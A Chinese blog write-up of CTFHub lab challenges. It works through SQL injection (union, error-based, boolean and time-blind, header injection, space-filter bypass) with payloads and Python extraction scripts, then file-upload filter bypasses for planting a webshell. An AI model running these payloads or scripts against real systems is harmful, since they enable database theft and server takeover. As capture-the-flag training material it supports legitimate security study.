ctfhub技能树-WEB(SQL注入和文件上传)

最新推荐文章于 2023-03-11 15:22:53 发布
最新推荐文章于 2023-03-11 15:22:53 发布
阅读量1.1k 收藏 9
点赞数 1
文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/chiza2596/article/details/120404901
版权

SQL注入

整数型注入

1、判断注入类型

1 and 1=1   正常输出
1 and 1=2   不输出   (数字型注入)

    

2、猜解字段数

1 order by 2      页面回显正常
1 order by 3      页面无回显       字段数为2

3、查看显示位

-1 union select 1,2      显示位是Data

4、查看数据库名

-1 union select 1,database()

-1 union select 1,group_concat(schema_name) from information_schema.schemata

5、查看表名

-1 union select 1,group_concat(table_name) from information_schema.tables where table_schema='sqli'

6、查看列名

-1 union select 1,group_concat(column_name) from information_schema.columns where table_name='flag'

7、查看数据

-1 union select 1,group_concat(flag) from flag

字符型注入

1、判断注入类型

1 and 1=1     回显正常
1 and 1=2     回显正常    字符型注入

2、尝试闭合

经过尝试发现为单引号闭合(根据显示的SQL语句也可看出闭合方式)

3、猜解字段数

1' order by 2#   回显正常      (最后需要用#注释掉后面的单引号,不然会造成语法错误)
1' order by 3#   没有回显      字段数为2

4、查看显示位

-1' union select 2,3#          ID,Data 都是显示位

4、查看数据库

-1' union select 1,database()#

-1' union select 1,group_concat(schema_name) from information_schema.schemata#

5、查看表名

-1' union select 1,group_concat(table_name) from information_schema.tables where table_schema='sqli'#

6、查看列名

-1' union select 1,group_concat(column_name) from information_schema.columns where table_name='flag'#

7、查看数据

-1' union select 1,group_concat(flag) from flag#

报错注入

1、判断注入类型

1'    有报错显示,可以利用报错注入来获取数据库内容

2、查看数据库名

1 and updatexml(1,concat(0x7e,(select schema_name from information_schema.schemata limit 0,1),0x7e),3)#

3、查看表名

1 and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='sqli' limit 0,1),0x7e),3)#

4、查看列名

1 and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_name='flag' limit 0,1),0x7e),3)#

5、查看数据

1 and updatexml(1,concat(0x7e,(select concat(flag) from flag limit 0,1),0x7e),3)#

布尔盲注

1、判断注入类型

经过测试,发现没有显示位,也没有报错信息,可以利用盲注来获取数据库信息

手工注入时可使用例如left((select database()),1)<'t' 这样的比较二分查找方法快速爆破。

2、猜解数据库名长度

1 and (length(database()))=4   数据库名长度为4

3、猜解数据库名

1 and left((select database()),1)='s'

4、猜解数据库中表的数量

1 and (select count(table_name) from information_schema.tables
 where table_schema=database())=2

5、猜解表名

1 and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))=102

1 and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),2,1))=108          
(不断改变ASCII码范围,逐一猜解表名)

6、猜解表'flag'中的字段数

1 and (select count(column_name) from information_schema.columns
 where table_name='flag')=1

7、猜解列名

1 and ascii(substr((select column_name from information_schema.columns where table_name='flag' limit 0,1),1,1))=102

1 and ascii(substr((select column_name from information_schema.columns where table_name='flag' limit 0,1),2,1))=108
(不断改变ASCII码范围,逐一猜解列名)

6、猜解数据

1 and ascii(substr((select * from sqli.flag where id=1),1,1))=99
(不断改变ASCII码范围,逐一猜解数据)

Python脚本

import requests

urlOPEN = 'http://challenge-a2d91315845dd079.sandbox.ctfhub.com:10800/?id='
starOperatorTime = []
mark = 'query_success'


def database_name():
    name = ''
    for j in range(1, 9):
        for i in 'sqcwertyuioplkjhgfdazxvbnm':
            url = urlOPEN + 'if(substr(database(),%d,1)="%s",1,(select table_name from information_schema.tables))' % (
            j, i)
            r = requests.get(url)
            if mark in r.text:
                name = name + i
                print(name)
                break
    print('database_name:', name)


database_name()


def table_name():
    list = []
    for k in range(0, 4):
        name = ''
        for j in range(1, 9):
            for i in 'sqcwertyuioplkjhgfdazxvbnm':
                url = urlOPEN + 'if(substr((select table_name from information_schema.tables where table_schema=database() limit %d,1),%d,1)="%s",1,(select table_name from information_schema.tables))' % (
                k, j, i)
                r = requests.get(url)
                if mark in r.text:
                    name = name + i
                    break
        list.append(name)
    print('table_name:', list)


table_name()


def column_name():
    list = []
    for k in range(0, 3):  # 判断表里最多有4个字段
        name = ''
        for j in range(1, 9):  # 判断一个 字段名最多有9个字符组成
            for i in 'sqcwertyuioplkjhgfdazxvbnm':
                url = urlOPEN + 'if(substr((select column_name from information_schema.columns where table_name="flag"and table_schema= database() limit %d,1),%d,1)="%s",1,(select table_name from information_schema.tables))' % (
                k, j, i)
                r = requests.get(url)
                if mark in r.text:
                    name = name + i
                    break
        list.append(name)
    print('column_name:', list)


column_name()


def get_data():
    name = ''
    for j in range(1, 50):  # 判断一个值最多有51个字符组成
        for i in range(48, 126):
            url = urlOPEN + 'if(ascii(substr((select flag from flag),%d,1))=%d,1,(select table_name from information_schema.tables))' % (
            j, i)
            r = requests.get(url)
            if mark in r.text:
                name = name + chr(i)
                print(name)
                break
    print('value:', name)


get_data()

时间盲注

1、判断注入类型

无论输入什么,都没有回显,尝试使用时间盲注来获取数据库信息

2、猜解数据库长度

1 and if(length(database())=4,sleep(5),1)

3、猜解数据库名

1 and if(ascii(substr(database(),1,1))=115,sleep(5),1)

4、猜解数据库中表的数量

1 and if((select count(table_name) from information_schema.tables  where table_schema=database())=2,sleep(5),1)

5、猜解表名

1 and if((select ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1)))=110,sleep(5),1)

6、猜解表'flag'中的字段数

1 and if((select count(column_name) from information_schema.columns
 where table_name='flag')=1,sleep(5),1)

7、猜解列名

1 and if((select ascii(substr((select column_name from information_schema.columns where table_name='flag' limit 0,1),1,1)))=102, sleep(5),0)

8、猜解数据

1 and if((select ascii(substr((select flag from flag limit 0,1),1,1)))=99,sleep(5),1)

Python脚本

import requests
import time
#coding:utf-8
urlstart='http://challenge-ba37c57032fb4423.sandbox.ctfhub.com:10800/?id='
def version():
    for i in range(1,21):
        url=urlstart+'if(length(version())='+str(i)+',sleep(5),1)'
        starttime=time.time()
        a=requests.get(url)
        endtime=time.time()
        b=endtime-starttime
        print(b)
        if b>5:
            print(i)
            break
        #print a.content
    for j in range(1,i+1):
        for k in range(32,127):
            url1=urlstart+'if(ascii(substr(version(),'+str(j)+',1))='+str(k)+',sleep(5),1)'
            starttime=time.time()
            a=requests.get(url1)
            endtime=time.time()
            b=endtime-starttime
            if b>5:
                print(chr(k))
                break
def datebase_name():
    for m in range(1,21):
        url2=urlstart+'if(length(database())='+str(m)+',sleep(5),1)'
        starttime=time.time()
        a=requests.get(url2)
        endtime=time.time()
        b=endtime-starttime
        if b>5:
            print(m)
            break
    for n in range(1,m+1):
        for h in range(32,127):
            url3=urlstart+'if(ascii(substr(database(),'+str(n)+',1))='+str(h)+',sleep(5),1)'
            starttime=time.time()
            a=requests.get(url3)
            endtime=time.time()
            b=endtime-starttime
            if b>5:
                print (chr(h))
                break
def table_name():
    list = []
    for k in range(0, 4):
        name = ''
        for j in range(1, 9):
            for i in 'abcdefghijklmnopqrstuvwxyz0123456789@_.{}-':
                url = urlstart + 'if(substr((select table_name from information_schema.tables where table_schema=database() limit %d,1),%d,1)="%s",sleep(5),1)' % (
                k, j, i)
                starttime = time.time()
                r = requests.get(url)
                endtime = time.time()
                b = endtime - starttime
                if b>5:
                    name = name + i
                    break
        list.append(name)
    print('table_name:', list)
def column_name():
    name = ''
    for k in range(0,4):
        for j in range(1, 50):
            for i in 'abcdefghijklmnopqrstuvwxyz0123456789@_.{}-':
                url = urlstart + 'if(substr((select column_name from information_schema.columns where table_name="flag"and table_schema= database() limit %d ,1), %d ,1)= "%s" ,sleep(5),1)'% (
                k, j, i)
                starttime = time.time()
                r = requests.get(url)
                endtime = time.time()
                b = endtime - starttime
                if b > 5:
                    name = name + chr(i)
                    print(name)
                    break
    print ('value:', name)
def get_data():
    name = ''
    for j in range(1, 50):
        for i in range(48, 126):
            url = urlstart + 'if(ascii(substr((select flag from flag),%d,1))=%d,sleep(3),1)' % (
            j, i)
            starttime = time.time()
            r = requests.get(url)
            endtime = time.time()
            b = endtime - starttime
            if b > 3:
                name = name + chr(i)
                print(name)
                break
    print ('value:', name)
get_data()

MySQL结构

1、判断输入类型

1 and 1=1    回显正常
1 and 1=2    没有回显    数字型注入

2、猜解字段数

1 order by 2   回显正常
1 order by 3   没有回显     字段数为2

3、查看显示位

-1 union select 2,3          ID,Data都是显示位

4、查看数据库名

-1 union select 1,database()

-1 union select 1,group_concat(schema_name) from information_schema.schemata

5、查看表名

-1 union select 1,group_concat(table_name) from information_schema.tables where table_schema='sqli'

6、查看列名

-1 union select 1,group_concat(column_name) from information_schema.columns where table_name='voxltovzyz'

7、查看数据

-1 union select 1,group_concat(ljuaaouxat) from voxltovzyz

Cookie注入

1、Cookie注入,利用burpsuite抓包来修改数据包实现注入

2、判断注入类型

1 and 1=1     回显正常
1 and 1=2     没有回显      数字型注入

3、猜解字段数

1 order by 2    回显正常
1 order by 3    没有回显   字段数为2

4、查看显示位

-1 union select 2,3    ID,Data都是显示位

5、查看数据库名

-1 union select 1,database()

-1 union select 1,group_concat(schema_name) from information_schema.schemata

6、查看表名

-1 union select 1,group_concat(table_name) from information_schema.tables where table_schema='sqli'

7、查看列名

-1 union select 1,group_concat(column_name) from information_schema.columns where table_name='irggdskcyg'

8、查看数据

-1 union select 1,group_concat(jmlkyalpjp) from irggdskcyg

UA注入

1、UA注入,即User-Agent,利用burpsuite抓包来修改数据包实现注入

User-Agent:是客户浏览器名称。

2、判断注入类型

1 and 1=1     回显正常
1 and 1=2     没有回显      数字型注入

3、猜解字段数

1 order by 2    回显正常
1 order by 3    没有回显   字段数为2

4、查看显示位

-1 union select 2,3    ID,Data都是显示位

5、查看数据库名

-1 union select 1,database()

-1 union select 1,group_concat(schema_name) from information_schema.schemata

6、查看表名

-1 union select 1,group_concat(table_name) from information_schema.tables where table_schema='sqli'

7、查看列名

-1 union select 1,group_concat(column_name) from information_schema.columns where table_name='htvppynvth'

8、查看数据

-1 union select 1,group_concat(pgrhwmjgxx) from htvppynvth

Refer注入

1、Refer注入,利用burpsuite抓包来修改数据包实现注入

Referer:表明产生请求的网页URL。如比从网页/icconcept/index.jsp中点击一个链接到网页/icwork/search,在向服务器发送的GET/icwork/search中的请求中,Referer是http://hostname:8080/icconcept/index.jsp。这个属性可以用来跟踪web请求是从什么网站来的。

抓到数据包之后发现是没有referer的,可以手动加上去

2、判断注入类型

1 and 1=1     回显正常
1 and 1=2     没有回显      数字型注入

3、猜解字段数

1 order by 2    回显正常
1 order by 3    没有回显   字段数为2

4、查看显示位

-1 union select 2,3    ID,Data都是显示位

5、查看数据库名

-1 union select 1,database()

-1 union select 1,group_concat(schema_name) from information_schema.schemata

6、查看表名

-1 union select 1,group_concat(table_name) from information_schema.tables where table_schema='sqli'

7、查看列名

-1 union select 1,group_concat(column_name) from information_schema.columns where table_name='jfseluytwo'

8、查看数据

-1 union select 1,group_concat(ijxmjyeqhx) from jfseluytwo

过滤空格

1、输入1 and 1=1后,没有回显数据

2、根据题目,过滤掉了空格,可以尝试用注释符/**/替换空格,实现绕过

3、判断注入类型

1/**/and/**/1=1     回显正常
1/**/and/**/1=2     没有回显      数字型注入

4、猜解字段数

1/**/order/**/by/**/2    回显正常
1/**/order/**/by/**/3    没有回显   字段数为2

5、查看显示位

-1/**/union/**/select/**/2,3    ID,Data都是显示位

6、查看数据库名

-1/**/union/**/select/**/1,database()

-1/**/union/**/select/**/1,group_concat(schema_name)/**/from/**/information_schema.schemata

7、查看表名

-1/**/union/**/select/**/1,group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema='sqli'

8、查看列名

-1/**/union/**/select/**/1,group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_name='xcpkwncbuq'

9、查看数据

-1/**/union/**/select/**/1,group_concat(kyachwkiak)/**/from/**/xcpkwncbuq

SQL注入完结

文件上传

无验证

1、因为没有验证,直接上传.php文件

2、成功上传

3、使用蚁剑也可成功连接

4、成功获取到flag

前端验证

1、直接上传.php文件,提示该文件不允许上传

2、因为是前端验证,打开开发者工具,禁用JavaScript即可成功上传

3、使用一键也可成功连接

4、成功获取到flag

.htaccess

1、直接上传.php文件,提示文件类型不匹配

2、查看源码发现过滤了一系列的后缀名

3、尝试使用.htaccess文件绕过,上传一个.htaccess文件,文件内容如下:

SetHandler application/x-httpd-php
.htaccess文件是Apache服务器中的一个配置文件,它负责相关目录下的网页配置。通过htaccess文件,可以实现:网页301重定向、自定义404错误页面、改变文件扩展名、允许/阻止特定的用户或者目录的访问、禁止目录列表、配置默认文档等功能IIS平台上不存在该文件,该文件默认开启,启用和关闭在httpd.conf文件中配置。

4、上传黑名单中没有限制的图片马即可成功上传

5、利用蚁剑链接即可

6、成功获取到flag

MIME绕过

1、直接上传.php文件,提示文件类型不正确

2、MIME绕过,只验证Content-type,抓包将Content-type修改为允许上传的文件类型即可

3、成功上传!

4、使用蚁剑连接获取flag

00截断绕过

截断条件:php版本小于5.3.4,php的magic_quotes_gpc为Off状态

1、上传文件抓包,修改数据包

2、成功上传

3、使用蚁剑连接获取flag

双写后缀

1、抓包,修改数据包

2、成功上传

3、利用蚁剑连接获取flag

文件头检查

1、上传.php文件,提示:文件类型不正确, 只允许上传 jpeg jpg png gif 类型的文件

2、准备一张允许上传的图片马1.gif

gif图片的文件头为GIF89a

3、上传文件抓包

4、成功上传

5、利用蚁剑连接获取flag

文件上传完结

小陈是个憨憨
关注
CTFHUB-web-SQL注入
ookami6497的博客
11-29 825
CTFHUB SQL
CTFHUB-WEB-SQL注入
K_ShenH的博客
06-09 1243
CTFHUB-WEB-SQL注入
原创:APT之网站SQL注入导致的文件任意上传
08-24
原创:APT之网站SQL注入导致的文件任意上传
SQL注入——文件上传
heyingcheng的博客
03-11 2464
3,into outfile命令使用的环境:必须知道一个,服务器上可以写入文件的文件夹的完整路径。2,数据库的file权限规定了数据库用户是否有权限,向操作系统内写入和读取已存在的权限。在这里也可以用whoami看到小皮的权限,我给的是普通用户的权限,不是管理员权限。其实我们最终的目的是往目标靶场上上传一句话木,或者是自己想上传php文件。当然在试的过程中可能会出现一些碰巧的情况,比如用”试得到的是一样的结果。两种结果不一样,“错的就是错的“,所以我们找到了正确的闭合方式。
重走SQL注入文件上传
Pvr1sC的博客
01-30 491
主要是在DVWA上做做题 SQL eg low php mysqli_query 如果是执行查询之类的语句( select ),那么会返回一个资源标识符,也就是我们要查找的数据结果集;如果是执行增删改之类的语句,返回的就是true或者false了。 mysqli_fetch_assoc() 函数从结果集中取得一行作为关联数组。该函数返回 的字段名是区分大小写的。 mysql_num_rows() 函数返回结果集中行的数目。 mysql_result() 函数返回结果集中一个字段的值。 REQUEST作为全局
SQL注入:2、读写文件和下载数据库
千寻瀑
03-19 431
2、读写文件和下载数据库1、读取文件2、下载数据库:3、编写服务器端代码: 1、读取文件 下载:load_file() 输入:‘union select null,load_file(’/etc/passwd’) – 加载你要查询的文件(能否成功读取要看你的用户权限) 上传:dumpfile 输入:'union select null,"<?php passthru($_GET['...
记一次文件上传引发的 SQL 注入
Restart的博客
01-06 782
本文作者:Jerry Shah (Jerry) 翻译作者:myh0st 在一次测试过程中,发现一个文件上传的入口,如图: 测试时,使用 burp 提交数据包时,将文件名处添加 XSS 的 Payload:("><img src=x onerror=alert(document.domain>.png) 然后,发现 xss 漏洞触发执行,算是一个 self-xss,危害有限: 关闭弹窗后,发现一些错误信息: 感觉文件是文件名在插入数据库时报的错,所以尝试将 xss 的 payloa.
CTFHUB-技能树-WEB通关
Alita_lxz的博客
11-11 7149
Web 题目来自ctfhub技能树web部分 Web前置技能 操作系统 数据库 HTTP协议 请求方式 HTTP 请求方法, HTTP/1.1协议中共定义了八种方法(也叫动作)来以不同方式操作指定的资源。 ​ 1.OPTIONS   返回服务器针对特定资源所支持的HTTP请求方法。也可以利用向Web服务器发送’*'的请求来测试服务器的功能性,如获取当前URL所支持的方法。若请求成功,则它会在HTTP头中包含一个名为“Allow”的头,值是所支持的方法,如“GET,POST”。  2.HEAD   向服务
二、CTF-Web-SQL注入(记录CTF学习)
qq_27920699的博客
12-16 435
个人CTF学习之路
CTFHub技能树.Web.SQL注入 WriteUp与SQL注入学习笔记
qq_45716477的博客
04-19 579
目录Level 1整数型注入字符型注入报错注入布尔盲注时间盲注欢迎使用Markdown编辑器新的改变功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 Level 1 整数型注入 输入1 and 1=1 和1 and 1=2 输
记录一道题(sql注入+ssrf+文件上传
Huamang的博客
02-13 376
拿到题目,学长给了hint,代码泄露,可以直接拿御剑扫,也可以在网站后面写/www.zip拿到源代码 看了题目后第一层有两个可能,一个是爆破进去,还有一个是sql注入,看源代码里有sql语句的拼接,而且爆破可能性太低,所以选择sql注入 sql注入 代码审计 function escape1($string){ $a = 1; $b = 2; global $link; $string = $link->real_escape_string($string);
CTFHub技能树web-sql注入
m0_53314778的博客
01-11 165
整数型注入 sql语句 作用 select * from news where id=1 order by 1 猜解字段数,有数据返回则该数据库字段数为多少 select * from news where id=1 and 1=2 union select 1,database() union联合查询,database()查询数据库名 select * from news where id=1 and 1=2 union select 1,group_concat(table_na
蓝盾实训营day3——文件上传SQL注入进阶
mingC0758的博客
07-11 1068
cookie欺骗 原理:把登陆后的cookie保存下来,在其他地方访问页面时携带这个cookie.. https可能做不了这个实验 HTTP Cookie 设置了secure , 该cookie只能在HTTPS通道下被写入浏览器。 HTTPS Cookie 设置了secure , 该cookie只能在HTTPS通道下被写入浏览器。 HTTP Cookie ...
DVWA文件包含,上传sql注入靶场
iczfy585的博客
08-07 269
文件包含 什么是文件包含? 在php中文件包含主要是指调用了include(); include_once(); require(); require_once()函数。这些函数能够将包含的文本当做php代码去执行,而不管该文本是不是以php为扩展名的。文件包含可以分为本地文件包含()和远程文件包含。区别在于远程文件包含需要将php.ini文件中的 allow_url_fopen设置为On(默认...
CTFHub技能树web(持续更新)--SQL注入--MySQL结构
jiuyongpinyin的博客
09-05 873
MySQL结构 首先结果测试是可以使用联合查询语句的,前文中有提到过如何手工注入,这里就直接使用sqlmap进行注入 爆破当前数据库: 得到当前数据库: 爆破当前数据库的表名: 得到表名: 这里和之前不一样了,没有类似的flag的表名,但是有一个sappimemcd这个没见过的,爆破这个表名的列试试: 得到列名: 接着我们爆破里面的字段: 得到flag: 注:萌新第一次写write up,不足之处还请见谅,不对之处欢迎批评指正。 ...
CTFsql注入、文件包含、文件上传突破等五道题
hclimg的博客
12-28 3334
使用win7建立一个ctf的环境,在本地测试实验 新手练习,在网上找了很多的资料   1、sql注入     http://192.168.232.128/test/0x1oa/vulnerabilities/fu1.php?id=1%%27)--+ http://192.168.232.128/test/0x1oa/vulnerabilities/fu1.php?id=1%%27)or...
对某网站的渗透(SQL注入+上传Getshell)
热门推荐
江左盟的博客
04-22 1万+
信息收集 访问网站发现网站不存在robots.txt文件,扫描网站根目录未发现有价值的信息,点击网站按钮查看功能的时候发现有个路径是xxcms/…,然后访问xxcms发现网站跳转到后台,如图: 尝试弱口令和暴力枚举未发现正确口令,然后扫描xxcms目录发现一个未授权上传文件的页面,如图: 但是之能上传图片和office文档,尝试绕过失败,在主页和“投诉建议”功能处存在搜索框,但不存在SQL注入,如图: 点击“我要投诉/建议”发现可以写数据并提交,如图: 点击按钮之后其中一个数据包如图: 漏洞发现
真实渗透改编--综合渗透 sql注入+文件上传+udf提权 安鸾靶场SQL注入学习
AAAAAAAAAAAA66的博客
02-16 4980
从去年12月末到现在2月中,也算是把这个靶场的大多数题目刷了一遍,自己也能算的上一个初学者把,本文具体的教程在b站上有(建立靶场的师傅),而本文记录自己的解题和思考过程。如果之前没有接触到这些知识点的同学,可能会感觉到比较吃力,这是正常的。 哈兹本得的个人空间_哔哩哔哩_Bilibili 题目URL http://106.15.50.112:8023/ 目录 解题过程 sql注入 ​ 提权 准备udf文件(提权文件) 实施 解题过程 sql注入 寻找注入点 寻找网站真实.
网络安全——sql注入判断
W981113的博客
01-03 3832
?可以传递参数 sql数值型注入 1.判断注入点 ​ 数值型注入: ?id=1 and 1=1 , ?id=1 and 1=2 ​ 语句:select * from 表名 where id=1 and 1/2 2.猜字段数(二分法) ​ ?id=1 order by x 3.确定显示位 ​ ?id=-1 union select 1,2,3,4 --
ctfhub技能树web基础认证
最新发布
03-13
CTFHub是一个CTF(Capture The Flag)竞赛平台,提供了丰富的技能树来帮助学习者提升Web基础认证的能力。下面是CTFHub技能树中关于Web基础认证的内容: 1. HTTP协议:了解HTTP协议的基本原理和常见的请求方法(GET...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值